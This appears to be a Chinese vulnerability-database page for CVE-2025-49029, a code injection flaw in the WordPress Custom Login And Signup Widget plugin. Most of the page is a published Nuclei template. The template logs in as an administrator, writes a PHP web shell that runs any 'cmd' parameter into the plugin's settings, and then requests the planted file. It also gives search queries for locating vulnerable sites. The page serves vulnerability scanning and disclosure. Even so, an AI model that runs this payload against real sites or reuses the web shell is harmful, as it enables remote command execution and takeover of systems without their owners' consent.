CVE-2025-49029: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution

日期: 2025-08-01 | 影响软件: WordPress Custom Login And Signup Widget Plugin | POC: 已公开

漏洞描述

Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0

PoC代码[已公开]

id: CVE-2025-49029

info:
  name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
  author: pussycat0x
  severity: high
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0
  reference:
    - https://github.com/Nxploited/CVE-2025-49029
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-login-and-signup-widget/custom-login-and-signup-widget-10-authenticated-administrator-remote-code-execution
  classification:
    epss-score: 0.00137
    epss-percentile: 0.34279
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/custom-login-and-signup-widget/"
    fofa-query: body="/wp-content/plugins/custom-login-and-signup-widget/"
  tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login,file-upload,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/wp-admin/options-general.php?page=custom-login-and-signup-widget
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}

        text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

      - |
        GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_2, "custom-login-and-signup-widget")
          - status_code_3 == 500
        condition: and
# digest: 4a0a00473045022100b0895bc8d9998593ea58ea191cbe56ef241e354b4f59beda3ab98c9c7be1934002200ac024d97b65abea03e546843a0b2d1efabda4b5593eaf0fb979282f0bc1ab82:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-49029.yaml

相关漏洞推荐